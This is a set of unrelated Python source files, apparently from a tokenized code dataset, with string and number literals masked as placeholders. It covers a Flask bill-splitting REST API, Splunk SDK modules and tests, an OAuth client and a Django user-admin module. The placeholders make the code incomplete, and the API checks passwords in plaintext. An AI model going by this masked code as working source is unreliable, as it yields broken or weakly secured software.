'<STR_LIT>' . format ( auth_password ) , <EOL> } <EOL> def tearDown ( self ) : <EOL> self . db . delete_db ( ) <EOL> self . indexer . delete_indices ( ) <EOL> def force_unicode ( data ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( data , six . string_types ) : <EOL> return six . text_type ( data ) <EOL> elif isinstance ( data , collections . Mapping ) : <EOL> return dict ( map ( force_unicode , six . iteritems ( data ) ) ) <EOL> elif isinstance ( data , collections . Iterable ) : <EOL> return type ( data ) ( map ( force_unicode , data ) ) <EOL> else : <EOL> return data </s>
<s> from flask import Blueprint , request <EOL> from flask . ext . rest import RESTResource , need_auth <EOL> from models import db , Project , Person , Bill <EOL> from forms import ( ProjectForm , EditProjectForm , MemberForm , <EOL> get_billform_for ) <EOL> api = Blueprint ( "<STR_LIT>" , __name__ , url_prefix = "<STR_LIT>" ) <EOL> def check_project ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> auth = request . authorization <EOL> if auth and "<STR_LIT>" in kwargs and auth . username == kwargs [ "<STR_LIT>" ] : <EOL> project = Project . query . get ( auth . username ) <EOL> if project and project . password == auth . password : <EOL> return project <EOL> return False <EOL> class ProjectHandler ( object ) : <EOL> def add ( self ) : <EOL> form = ProjectForm ( csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> project = form . save ( ) <EOL> db . session . add ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , project . id <EOL> return <NUM_LIT> , form . errors <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def get ( self , project ) : <EOL> return <NUM_LIT:200> , project <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def delete ( self , project ) : <EOL> db . session . delete ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , "<STR_LIT>" <EOL> @ need_auth ( check_project , "<STR_LIT>" ) <EOL> def update ( self , project ) : <EOL> form = EditProjectForm ( csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> form . update ( project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , "<STR_LIT>" <EOL> return <NUM_LIT> , form . errors <EOL> class MemberHandler ( object ) : <EOL> def get ( self , project , member_id ) : <EOL> member = Person . query . get ( member_id , project ) <EOL> if not member or member . project != project : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , member <EOL> def list ( self , project ) : <EOL> return <NUM_LIT:200> , project . 
members <EOL> def add ( self , project ) : <EOL> form = MemberForm ( project , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> member = Person ( ) <EOL> form . save ( project , member ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , member . id <EOL> return <NUM_LIT> , form . errors <EOL> def update ( self , project , member_id ) : <EOL> form = MemberForm ( project , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> member = Person . query . get ( member_id , project ) <EOL> form . save ( project , member ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , member <EOL> return <NUM_LIT> , form . errors <EOL> def delete ( self , project , member_id ) : <EOL> if project . remove_member ( member_id ) : <EOL> return <NUM_LIT:200> , "<STR_LIT:OK>" <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> class BillHandler ( object ) : <EOL> def get ( self , project , bill_id ) : <EOL> bill = Bill . query . get ( project , bill_id ) <EOL> if not bill : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , bill <EOL> def list ( self , project ) : <EOL> return project . get_bills ( ) . all ( ) <EOL> def add ( self , project ) : <EOL> form = get_billform_for ( project , True , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> bill = Bill ( ) <EOL> form . save ( bill , project ) <EOL> db . session . add ( bill ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT> , bill . id <EOL> return <NUM_LIT> , form . errors <EOL> def update ( self , project , bill_id ) : <EOL> form = get_billform_for ( project , True , csrf_enabled = False ) <EOL> if form . validate ( ) : <EOL> bill = Bill . query . get ( project , bill_id ) <EOL> form . save ( bill , project ) <EOL> db . session . commit ( ) <EOL> return <NUM_LIT:200> , bill . id <EOL> return <NUM_LIT> , form . errors <EOL> def delete ( self , project , bill_id ) : <EOL> bill = Bill . query . delete ( project , bill_id ) <EOL> db . session . 
commit ( ) <EOL> if not bill : <EOL> return <NUM_LIT> , "<STR_LIT>" <EOL> return <NUM_LIT:200> , "<STR_LIT:OK>" <EOL> project_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> actions = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> handler = ProjectHandler ( ) ) <EOL> member_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> inject_name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> handler = MemberHandler ( ) , <EOL> authentifier = check_project ) <EOL> bill_resource = RESTResource ( <EOL> name = "<STR_LIT>" , <EOL> inject_name = "<STR_LIT>" , <EOL> route = "<STR_LIT>" , <EOL> app = api , <EOL> handler = BillHandler ( ) , <EOL> authentifier = check_project ) </s>
<s> import logging <EOL> import os <EOL> from flask import Flask <EOL> from harold . conf import HaroldConfiguration <EOL> from harold . plugins . database import DatabaseConfig <EOL> import flask_github <EOL> app = Flask ( __name__ ) <EOL> config = HaroldConfiguration ( os . environ [ "<STR_LIT>" ] ) <EOL> _db_config = DatabaseConfig ( config ) <EOL> app . config [ "<STR_LIT>" ] = _db_config . connection_string <EOL> app . config . from_envvar ( "<STR_LIT>" ) <EOL> github = flask_github . GitHub ( app ) <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> import salon . views </s>
<s> from __future__ import absolute_import , unicode_literals <EOL> """<STR_LIT>""" <EOL> from . base import Client <EOL> from . . parameters import prepare_grant_uri <EOL> from . . parameters import parse_implicit_response <EOL> class MobileApplicationClient ( Client ) : <EOL> """<STR_LIT>""" <EOL> def prepare_request_uri ( self , uri , redirect_uri = None , scope = None , <EOL> state = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return prepare_grant_uri ( uri , self . client_id , '<STR_LIT>' , <EOL> redirect_uri = redirect_uri , state = state , scope = scope , ** kwargs ) <EOL> def parse_request_uri_response ( self , uri , state = None , scope = None ) : <EOL> """<STR_LIT>""" <EOL> self . token = parse_implicit_response ( uri , state = state , scope = scope ) <EOL> self . _populate_attributes ( self . token ) <EOL> return self . token </s>
<s> from abc import ABCMeta , abstractmethod <EOL> from urlparse import urlsplit <EOL> import sys <EOL> from splunklib . client import Service <EOL> from splunklib . modularinput . event_writer import EventWriter <EOL> from splunklib . modularinput . input_definition import InputDefinition <EOL> from splunklib . modularinput . validation_definition import ValidationDefinition <EOL> try : <EOL> import xml . etree . cElementTree as ET <EOL> except ImportError : <EOL> import xml . etree . ElementTree as ET <EOL> class Script ( object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = ABCMeta <EOL> def __init__ ( self ) : <EOL> self . _input_definition = None <EOL> self . _service = None <EOL> def run ( self , args ) : <EOL> """<STR_LIT>""" <EOL> return self . run_script ( args , EventWriter ( ) , sys . stdin ) <EOL> def run_script ( self , args , event_writer , input_stream ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> self . _input_definition = InputDefinition . parse ( input_stream ) <EOL> self . stream_events ( self . _input_definition , event_writer ) <EOL> event_writer . close ( ) <EOL> return <NUM_LIT:0> <EOL> elif str ( args [ <NUM_LIT:1> ] ) . lower ( ) == "<STR_LIT>" : <EOL> scheme = self . get_scheme ( ) <EOL> if scheme is None : <EOL> event_writer . log ( <EOL> EventWriter . FATAL , <EOL> "<STR_LIT>" ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> event_writer . write_xml_document ( scheme . to_xml ( ) ) <EOL> return <NUM_LIT:0> <EOL> elif args [ <NUM_LIT:1> ] . lower ( ) == "<STR_LIT>" : <EOL> validation_definition = ValidationDefinition . parse ( input_stream ) <EOL> try : <EOL> self . validate_input ( validation_definition ) <EOL> return <NUM_LIT:0> <EOL> except Exception as e : <EOL> root = ET . Element ( "<STR_LIT:error>" ) <EOL> ET . SubElement ( root , "<STR_LIT:message>" ) . text = e . message <EOL> event_writer . 
write_xml_document ( root ) <EOL> return <NUM_LIT:1> <EOL> else : <EOL> err_string = "<STR_LIT>" + '<STR_LIT:U+0020>' . join ( args ) <EOL> event_writer . _err . write ( err_string ) <EOL> except Exception as e : <EOL> err_string = EventWriter . ERROR + e . message <EOL> event_writer . _err . write ( err_string ) <EOL> return <NUM_LIT:1> <EOL> @ property <EOL> def service ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _service is not None : <EOL> return self . _service <EOL> if self . _input_definition is None : <EOL> return None <EOL> splunkd_uri = self . _input_definition . metadata [ "<STR_LIT>" ] <EOL> session_key = self . _input_definition . metadata [ "<STR_LIT>" ] <EOL> scheme , netloc , _ , _ , _ = urlsplit ( splunkd_uri , allow_fragments = False ) <EOL> splunkd_host , splunkd_port = netloc . split ( '<STR_LIT::>' ) <EOL> self . _service = Service ( <EOL> scheme = scheme , host = splunkd_host , port = splunkd_port , <EOL> token = session_key ) <EOL> return self . _service <EOL> @ abstractmethod <EOL> def get_scheme ( self ) : <EOL> """<STR_LIT>""" <EOL> def validate_input ( self , definition ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ abstractmethod <EOL> def stream_events ( self , inputs , ew ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import xml . etree . cElementTree as et <EOL> except : <EOL> import xml . etree . ElementTree as et <EOL> try : <EOL> from collections import OrderedDict <EOL> except : <EOL> from ordereddict import OrderedDict <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class Message ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , type_ , message ) : <EOL> self . type = type_ <EOL> self . message = message <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . type , self . message ) <EOL> def __eq__ ( self , other ) : <EOL> return ( self . type , self . message ) == ( other . type , other . message ) <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . type , self . message ) ) <EOL> class _ConcatenatedStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * streams ) : <EOL> self . streams = list ( streams ) <EOL> def read ( self , n = None ) : <EOL> """<STR_LIT>""" <EOL> response = "<STR_LIT>" <EOL> while len ( self . streams ) > <NUM_LIT:0> and ( n is None or n > <NUM_LIT:0> ) : <EOL> txt = self . streams [ <NUM_LIT:0> ] . read ( n ) <EOL> response += txt <EOL> if n is not None : <EOL> n -= len ( txt ) <EOL> if n > <NUM_LIT:0> or n is None : <EOL> del self . streams [ <NUM_LIT:0> ] <EOL> return response <EOL> class _XMLDTDFilter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> def read ( self , n = None ) : <EOL> """<STR_LIT>""" <EOL> response = "<STR_LIT>" <EOL> while n is None or n > <NUM_LIT:0> : <EOL> c = self . stream . read ( <NUM_LIT:1> ) <EOL> if c == "<STR_LIT>" : <EOL> break <EOL> elif c == "<STR_LIT:<>" : <EOL> c += self . stream . read ( <NUM_LIT:1> ) <EOL> if c == "<STR_LIT>" : <EOL> while True : <EOL> q = self . stream . 
read ( <NUM_LIT:1> ) <EOL> if q == "<STR_LIT:>>" : <EOL> break <EOL> else : <EOL> response += c <EOL> if n is not None : <EOL> n -= len ( c ) <EOL> else : <EOL> response += c <EOL> if n is not None : <EOL> n -= <NUM_LIT:1> <EOL> return response <EOL> class ResultsReader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> stream = _XMLDTDFilter ( stream ) <EOL> stream = _ConcatenatedStream ( StringIO ( "<STR_LIT>" ) , stream , StringIO ( "<STR_LIT>" ) ) <EOL> self . is_preview = None <EOL> self . _gen = self . _parse_results ( stream ) <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> return self . _gen . next ( ) <EOL> def _parse_results ( self , stream ) : <EOL> """<STR_LIT>""" <EOL> result = None <EOL> values = None <EOL> try : <EOL> for event , elem in et . iterparse ( stream , events = ( '<STR_LIT:start>' , '<STR_LIT:end>' ) ) : <EOL> if elem . tag == '<STR_LIT>' and event == '<STR_LIT:start>' : <EOL> is_preview = elem . attrib [ '<STR_LIT>' ] == '<STR_LIT:1>' <EOL> self . is_preview = is_preview <EOL> if elem . tag == '<STR_LIT:result>' : <EOL> if event == '<STR_LIT:start>' : <EOL> result = OrderedDict ( ) <EOL> elif event == '<STR_LIT:end>' : <EOL> yield result <EOL> result = None <EOL> elem . clear ( ) <EOL> elif elem . tag == '<STR_LIT>' and result is not None : <EOL> if event == '<STR_LIT:start>' : <EOL> values = [ ] <EOL> elif event == '<STR_LIT:end>' : <EOL> field_name = elem . attrib [ '<STR_LIT:k>' ] . encode ( '<STR_LIT:utf8>' ) <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> result [ field_name ] = values [ <NUM_LIT:0> ] <EOL> else : <EOL> result [ field_name ] = values <EOL> elem . clear ( ) <EOL> elif elem . tag in ( '<STR_LIT:text>' , '<STR_LIT:v>' ) and event == '<STR_LIT:end>' : <EOL> values . append ( elem . text . encode ( '<STR_LIT:utf8>' ) ) <EOL> elem . clear ( ) <EOL> elif elem . tag == '<STR_LIT>' : <EOL> if event == '<STR_LIT:start>' : <EOL> msg_type = elem . 
attrib [ '<STR_LIT:type>' ] <EOL> elif event == '<STR_LIT:end>' : <EOL> yield Message ( msg_type , elem . text . encode ( '<STR_LIT:utf8>' ) ) <EOL> elem . clear ( ) <EOL> except et . ParseError as pe : <EOL> if '<STR_LIT>' in pe . msg : <EOL> return <EOL> else : <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" ) ) <EOL> import time <EOL> import datetime <EOL> from splunklib . client import connect <EOL> try : <EOL> from utils import parse <EOL> except ImportError : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> SPLUNK_HOST = "<STR_LIT:localhost>" <EOL> SPLUNK_PORT = <NUM_LIT> <EOL> INGEST_TYPE = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> RULES = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : "<STR_LIT>" % INGEST_TYPE <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : "<STR_LIT:127.0.0.1>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } , <EOL> '<STR_LIT:type>' : { <EOL> '<STR_LIT>' : [ "<STR_LIT>" ] , <EOL> '<STR_LIT:default>' : SPLUNK_PORT , <EOL> '<STR_LIT>' : "<STR_LIT>" % SPLUNK_PORT <EOL> } , <EOL> } <EOL> def feed_index ( service , opts ) : <EOL> """<STR_LIT>""" <EOL> indexname = opts . args [ <NUM_LIT:0> ] <EOL> itype = opts . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> index = service . indexes [ indexname ] <EOL> except KeyError : <EOL> print "<STR_LIT>" % indexname <EOL> return <EOL> if itype in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> stream = index . attach ( ) <EOL> else : <EOL> input_host = opts . kwargs . get ( "<STR_LIT>" , SPLUNK_HOST ) <EOL> input_port = int ( opts . kwargs . get ( "<STR_LIT>" , SPLUNK_PORT ) ) <EOL> input_name = "<STR_LIT>" % ( input_port ) <EOL> if input_name not in service . inputs . list ( ) : <EOL> service . inputs . create ( "<STR_LIT>" , input_port , index = indexname ) <EOL> ingest = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> ingest . 
connect ( ( input_host , input_port ) ) <EOL> count = <NUM_LIT:0> <EOL> lastevent = "<STR_LIT>" <EOL> try : <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> for j in range ( <NUM_LIT:0> , <NUM_LIT> ) : <EOL> lastevent = "<STR_LIT>" % ( datetime . datetime . now ( ) . isoformat ( ) , i , j ) <EOL> if itype == "<STR_LIT>" : <EOL> stream . write ( lastevent + "<STR_LIT:\n>" ) <EOL> elif itype == "<STR_LIT>" : <EOL> index . submit ( lastevent + "<STR_LIT:\n>" ) <EOL> else : <EOL> ingest . send ( lastevent + "<STR_LIT:\n>" ) <EOL> count = count + <NUM_LIT:1> <EOL> print "<STR_LIT>" % count <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> print "<STR_LIT>" <EOL> print lastevent <EOL> def main ( ) : <EOL> usage = "<STR_LIT>" <EOL> argv = sys . argv [ <NUM_LIT:1> : ] <EOL> if len ( argv ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> opts = parse ( argv , RULES , "<STR_LIT>" , usage = usage ) <EOL> service = connect ( ** opts . kwargs ) <EOL> if opts . kwargs [ '<STR_LIT>' ] not in INGEST_TYPE : <EOL> print "<STR_LIT>" % INGEST_TYPE <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> feed_index ( service , opts ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> from itertools import imap <EOL> from . decorators import ConfigurationSetting <EOL> from . search_command import SearchCommand <EOL> class EventingCommand ( SearchCommand ) : <EOL> """<STR_LIT>""" <EOL> def transform ( self , records ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> def _execute ( self , ifile , process ) : <EOL> SearchCommand . _execute ( self , ifile , self . transform ) <EOL> class ConfigurationSettings ( SearchCommand . ConfigurationSettings ) : <EOL> """<STR_LIT>""" <EOL> required_fields = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> clear_required_fields = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> retainsevents = ConfigurationSetting ( readonly = True , value = True , doc = '''<STR_LIT>''' ) <EOL> maxinputs = ConfigurationSetting ( doc = '''<STR_LIT>''' ) <EOL> type = ConfigurationSetting ( readonly = True , value = '<STR_LIT>' , doc = '''<STR_LIT>''' ) <EOL> @ classmethod <EOL> def fix_up ( cls , command ) : <EOL> """<STR_LIT>""" <EOL> if command . transform == EventingCommand . transform : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> SearchCommand . ConfigurationSettings . fix_up ( command ) <EOL> def iteritems ( self ) : <EOL> iteritems = SearchCommand . ConfigurationSettings . iteritems ( self ) <EOL> return imap ( lambda ( name , value ) : ( name , '<STR_LIT>' if name == '<STR_LIT:type>' else value ) , iteritems ) </s>
<s> import testlib <EOL> import logging <EOL> import splunklib . client as client <EOL> class TestRead ( testlib . SDKTestCase ) : <EOL> def test_read ( self ) : <EOL> service = client . connect ( ** self . opts . kwargs ) <EOL> confs = service . confs <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> self . assertTrue ( '<STR_LIT>' in confs ) <EOL> for stanza in confs [ '<STR_LIT>' ] . list ( count = <NUM_LIT:5> ) : <EOL> self . check_entity ( stanza ) <EOL> class TestConfs ( testlib . SDKTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestConfs , self ) . setUp ( ) <EOL> self . app_name = testlib . tmpname ( ) <EOL> self . app = self . service . apps . create ( self . app_name ) <EOL> kwargs = self . opts . kwargs . copy ( ) <EOL> kwargs [ '<STR_LIT>' ] = self . app_name <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> self . app_service = client . connect ( ** kwargs ) <EOL> def tearDown ( self ) : <EOL> self . service . apps . delete ( self . app_name ) <EOL> self . clear_restart_message ( ) <EOL> def test_confs ( self ) : <EOL> confs = self . app_service . confs <EOL> conf_name = testlib . tmpname ( ) <EOL> self . assertRaises ( KeyError , confs . __getitem__ , conf_name ) <EOL> self . assertFalse ( conf_name in confs ) <EOL> conf = confs . create ( conf_name ) <EOL> self . assertTrue ( conf_name in confs ) <EOL> self . assertEqual ( conf . name , conf_name ) <EOL> stanzas = conf . list ( ) <EOL> self . assertEqual ( len ( stanzas ) , <NUM_LIT:0> ) <EOL> count = len ( conf ) <EOL> stanza_name = testlib . tmpname ( ) <EOL> stanza = conf . create ( stanza_name ) <EOL> self . assertEqual ( len ( conf ) , count + <NUM_LIT:1> ) <EOL> self . assertTrue ( stanza_name in conf ) <EOL> self . 
assertEqual ( len ( stanza ) , <NUM_LIT:0> ) <EOL> key = testlib . tmpname ( ) <EOL> val = testlib . tmpname ( ) <EOL> stanza . update ( ** { key : val } ) <EOL> self . assertEventuallyTrue ( lambda : stanza . refresh ( ) and len ( stanza ) == <NUM_LIT:1> , pause_time = <NUM_LIT> ) <EOL> self . assertEqual ( len ( stanza ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( key in stanza ) <EOL> values = { testlib . tmpname ( ) : testlib . tmpname ( ) , <EOL> testlib . tmpname ( ) : testlib . tmpname ( ) } <EOL> stanza . submit ( values ) <EOL> stanza . refresh ( ) <EOL> for key , value in values . iteritems ( ) : <EOL> self . assertTrue ( key in stanza ) <EOL> self . assertEqual ( value , stanza [ key ] ) <EOL> count = len ( conf ) <EOL> conf . delete ( stanza_name ) <EOL> self . assertFalse ( stanza_name in conf ) <EOL> self . assertEqual ( len ( conf ) , count - <NUM_LIT:1> ) <EOL> self . assertRaises ( client . IllegalOperationException , confs . delete , conf_name ) <EOL> self . assertTrue ( conf_name in confs ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> unittest . main ( ) </s>
# Admin bindings for Django's built-in User and Group models.  Registers
# ModelAdmin subclasses that add password-change handling, restricted
# creation fieldsets, and permission-aware add views.
from django . db import transaction
from django . conf import settings
from django . contrib import admin
from django . contrib . auth . forms import ( UserCreationForm , UserChangeForm ,
    AdminPasswordChangeForm )
from django . contrib . auth . models import User , Group
from django . contrib import messages
from django . core . exceptions import PermissionDenied
from django . http import HttpResponseRedirect , Http404
from django . shortcuts import get_object_or_404
from django . template . response import TemplateResponse
from django . utils . html import escape
from django . utils . decorators import method_decorator
from django . utils . translation import ugettext , ugettext_lazy as _
from django . views . decorators . csrf import csrf_protect
from django . views . decorators . debug import sensitive_post_parameters

# method_decorator() wrappers so the plain view decorators can be applied
# to the ModelAdmin *methods* below (add_view, user_change_password).
csrf_protect_m = method_decorator ( csrf_protect )
sensitive_post_parameters_m = method_decorator ( sensitive_post_parameters ( ) )


class GroupAdmin ( admin . ModelAdmin ) :
    """Admin options for the Group model."""
    search_fields = ( '<STR_LIT:name>' , )
    ordering = ( '<STR_LIT:name>' , )
    filter_horizontal = ( '<STR_LIT>' , )

    def formfield_for_manytomany ( self , db_field , request = None , ** kwargs ) :
        # Preload the related objects for the M2M widget's queryset to
        # avoid one extra query per rendered choice.
        if db_field . name == '<STR_LIT>' :
            qs = kwargs . get ( '<STR_LIT>' , db_field . rel . to . objects )
            kwargs [ '<STR_LIT>' ] = qs . select_related ( '<STR_LIT>' )
        return super ( GroupAdmin , self ) . formfield_for_manytomany (
            db_field , request = request , ** kwargs )


class UserAdmin ( admin . ModelAdmin ) :
    """Admin options for the User model: custom add/change forms plus a
    dedicated password-change view."""
    add_form_template = '<STR_LIT>'
    change_user_password_template = None
    fieldsets = (
        ( None , { '<STR_LIT>' : ( '<STR_LIT:username>' , '<STR_LIT:password>' ) } ) ,
        ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' ) } ) ,
        ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ,
            '<STR_LIT>' , '<STR_LIT>' ) } ) ,
        ( _ ( '<STR_LIT>' ) , { '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) } ) ,
    )
    # Reduced fieldset used only on the "add user" page.
    add_fieldsets = (
        ( None , {
            '<STR_LIT>' : ( '<STR_LIT>' , ) ,
            '<STR_LIT>' : ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' ) }
        ) ,
    )
    form = UserChangeForm
    add_form = UserCreationForm
    change_password_form = AdminPasswordChangeForm
    list_display = ( '<STR_LIT:username>' , '<STR_LIT:email>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' )
    list_filter = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' )
    search_fields = ( '<STR_LIT:username>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:email>' )
    ordering = ( '<STR_LIT:username>' , )
    filter_horizontal = ( '<STR_LIT>' , '<STR_LIT>' , )

    def get_fieldsets ( self , request , obj = None ) :
        # No obj means we are on the "add" page: show the reduced fieldsets.
        if not obj :
            return self . add_fieldsets
        return super ( UserAdmin , self ) . get_fieldsets ( request , obj )

    def get_form ( self , request , obj = None , ** kwargs ) :
        """Use a special creation form (and its fields) when adding a user;
        the regular change form otherwise."""
        defaults = { }
        if obj is None :
            defaults . update ( {
                '<STR_LIT>' : self . add_form ,
                # NOTE(review): newer Django spells this admin.utils — confirm
                # the installed version still exposes admin.util.
                '<STR_LIT>' : admin . util . flatten_fieldsets ( self . add_fieldsets ) ,
            } )
        defaults . update ( kwargs )
        return super ( UserAdmin , self ) . get_form ( request , obj , ** defaults )

    def get_urls ( self ) :
        # Prepend the password-change URL so it wins over the default
        # object-detail patterns from ModelAdmin.
        from django . conf . urls import patterns
        return patterns ( '<STR_LIT>' ,
            ( r'<STR_LIT>' ,
                self . admin_site . admin_view ( self . user_change_password ) )
        ) + super ( UserAdmin , self ) . get_urls ( )

    def lookup_allowed ( self , lookup , value ) :
        # Never allow filtering on password hashes via the changelist URL.
        if lookup . startswith ( '<STR_LIT:password>' ) :
            return False
        return super ( UserAdmin , self ) . lookup_allowed ( lookup , value )

    @ sensitive_post_parameters_m
    @ csrf_protect_m
    @ transaction . commit_on_success
    def add_view ( self , request , form_url = '<STR_LIT>' , extra_context = None ) :
        # Adding a user requires *change* permission too, because the add
        # flow immediately redirects to the change page afterwards.
        if not self . has_change_permission ( request ) :
            if self . has_add_permission ( request ) and settings . DEBUG :
                # In DEBUG, explain the surprising permission requirement
                # instead of a blank PermissionDenied.
                raise Http404 (
                    '<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>'
                    '<STR_LIT>' )
            raise PermissionDenied
        if extra_context is None :
            extra_context = { }
        username_field = self . model . _meta . get_field ( self . model . USERNAME_FIELD )
        defaults = {
            '<STR_LIT>' : ( ) ,
            '<STR_LIT>' : username_field . help_text ,
        }
        extra_context . update ( defaults )
        return super ( UserAdmin , self ) . add_view ( request , form_url ,
            extra_context )

    @ sensitive_post_parameters_m
    def user_change_password ( self , request , id , form_url = '<STR_LIT>' ) :
        """Render and process the admin form for setting a user's password."""
        if not self . has_change_permission ( request ) :
            raise PermissionDenied
        user = get_object_or_404 ( self . queryset ( request ) , pk = id )
        if request . method == '<STR_LIT:POST>' :
            form = self . change_password_form ( user , request . POST )
            if form . is_valid ( ) :
                form . save ( )
                msg = ugettext ( '<STR_LIT>' )
                messages . success ( request , msg )
                return HttpResponseRedirect ( '<STR_LIT:..>' )
        else :
            form = self . change_password_form ( user )
        fieldsets = [ ( None , { '<STR_LIT>' : list ( form . base_fields ) } ) ]
        adminForm = admin . helpers . AdminForm ( form , fieldsets , { } )
        # Template context mirrors the standard change-form context so the
        # admin change_form template can be reused.
        context = {
            '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % escape ( user . get_username ( ) ) ,
            '<STR_LIT>' : adminForm ,
            '<STR_LIT>' : form_url ,
            '<STR_LIT>' : form ,
            '<STR_LIT>' : '<STR_LIT>' in request . REQUEST ,
            '<STR_LIT>' : True ,
            '<STR_LIT>' : False ,
            '<STR_LIT>' : False ,
            '<STR_LIT>' : True ,
            '<STR_LIT>' : False ,
            '<STR_LIT>' : self . model . _meta ,
            '<STR_LIT>' : user ,
            '<STR_LIT>' : False ,
            '<STR_LIT>' : True ,
        }
        return TemplateResponse ( request ,
            self . change_user_password_template or
            '<STR_LIT>' ,
            context , current_app = self . admin_site . name )

    def response_add ( self , request , obj , post_url_continue = None ) :
        """After adding a user, continue to the change page (to set extra
        fields) unless the user explicitly chose another action."""
        if '<STR_LIT>' not in request . POST and '<STR_LIT>' not in request . POST :
            # Force the "save and continue editing" behaviour by mutating
            # the POST data before delegating to the default handler.
            request . POST [ '<STR_LIT>' ] = <NUM_LIT:1>
        return super ( UserAdmin , self ) . response_add ( request , obj ,
            post_url_continue )


admin . site . register ( Group , GroupAdmin )
admin . site . register ( User , UserAdmin )
